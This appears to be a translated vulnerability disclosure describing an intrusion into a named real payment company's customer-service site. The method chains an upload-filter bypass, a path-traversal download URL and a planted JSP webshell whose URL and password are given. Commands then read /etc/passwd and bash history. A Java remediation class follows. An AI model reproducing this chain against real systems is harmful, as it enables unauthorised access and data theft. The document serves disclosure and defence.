Yifu site: from upload bypass to arbitrary file download to getshell
Site: http://kf.bestpay.com.cn, the Tianyi e-commerce customer service system
Chat with the customer service MM: http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp?QueueId=1011&guestId=&sessionId=&keyword=
Here is a file upload:
There are restrictions on it, but by using truncation and modifying the request, the check can be bypassed and a jsp file uploaded.
After the upload there is a serious problem: there is no way to find the shell's path. Nothing is returned, no similar path exists, crawling finds nothing, Google finds nothing, and no other site with a similar structure could be found.
With no other option, I chatted with the customer service MM for a while (by the way, she had a very good attitude and helped a lot; thank you very much) and asked her to send me the file. The download link she sent was: http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&MsgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp
Obviously this is an arbitrary file download. Testing it:
http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp
The usual penetration approach was broken, so the only option was to use the download vulnerability to analyze the source code. Only extensions such as jsp can be downloaded; extensions such as class cannot. Thanks to Xiaopeng @subversion for the help (Xiaopeng is a great Java and JSP development engineer who, of course, also likes security).
From the source, the path where sent files are stored is: /sendfile/client/
Concatenating the path gives the shell: http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp (password: jspy)
Database: not dumping it is my principle.
The permissions look quite broad:
Executing: cat /etc/passwd
Executing: cat /home/webapp/.bash_history
Executing: cat /etc/hosts
Solution:
Filter the upload filename and the download.jsp path parameter.
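As an added example (my code, not the site's and not from the original report), the following Java class shows the server-side checks that close the two holes described above: the upload extension check that truncation was used to bypass, and validation of the download.jsp path parameter so that /../../ can no longer escape the sendfile directory. The base directory, the allowed extensions, and the class and method names are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Pattern;

// Hypothetical helper for the customer-service file transfer feature.
public class SendFileGuard {
    // Assumed on-disk location of the page's /sendfile/client/ directory.
    private static final Path BASE =
            Paths.get("/PLACEHOLDER_WEBAPP_ROOT/sendfile/client").toAbsolutePath().normalize();
    // Assumed allowlist of content a chat attachment may legitimately carry.
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif", "pdf", "txt");
    // A stored name must be a bare filename: letters, digits, '_' or '-' segments joined by single
    // dots. This rejects '/', '\\', '..', leading dots and the null byte used for truncation.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]+(?:\\.[A-Za-z0-9]+)+");

    /** Extension of the complete name, so a trailing ".jsp" cannot be hidden behind a fake one. */
    static String extensionOf(String name) {
        int dot = name.lastIndexOf('.');
        return dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Upload: decide from the validated filename only; never trust the client's Content-Type. */
    public static boolean isAcceptableUpload(String clientFileName) {
        if (clientFileName == null || clientFileName.length() > 120) return false;
        if (!SAFE_NAME.matcher(clientFileName).matches()) return false;
        return ALLOWED.contains(extensionOf(clientFileName));
    }

    /** Download: resolve the "path" parameter and confirm it stays inside BASE with an allowed extension. */
    public static Path resolveDownload(String pathParam) {
        if (pathParam == null || !SAFE_NAME.matcher(pathParam).matches()) return null;
        Path target = BASE.resolve(pathParam).normalize();
        if (!target.startsWith(BASE)) return null;                 // blocks /../../download.jsp
        if (!ALLOWED.contains(extensionOf(pathParam))) return null; // never serve jsp/class/source
        return target;
    }

    public static void main(String[] args) {
        System.out.println(isAcceptableUpload("20150129113305618_1.jsp"));
        System.out.println(isAcceptableUpload("photo.jpg"));
        System.out.println(resolveDownload("/../../download.jsp"));
        System.out.println(resolveDownload("20150129113305618_1.jpg"));
    }
}
```

Serving the file by the server-generated stored name (rather than echoing realFileName into a filesystem path) and keeping the sendfile directory outside the servlet container's executable web root removes the getshell path even if a bad file is ever stored.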